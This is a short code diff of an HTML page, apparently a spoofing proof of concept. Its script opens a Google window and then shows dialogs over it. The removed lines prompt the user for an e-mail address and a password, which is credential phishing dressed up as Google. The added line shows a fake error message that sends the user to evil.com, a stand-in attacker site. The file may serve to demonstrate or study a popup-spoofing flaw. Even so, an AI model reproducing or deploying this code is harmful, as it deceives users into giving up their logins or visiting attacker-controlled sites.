--- a/orion.html
+++ b/orion.html
@@ -3,7 +3,6 @@
 <script> function go(){
  var x=window.open('https://www.google.com/csi');
  setTimeout(function(){
-    x.prompt('E-mail','');
-    x.prompt('Password','');} ,1000);
+    x.alert("Google cannot be opened. Please go to https://evil.com");
 }
 </script>
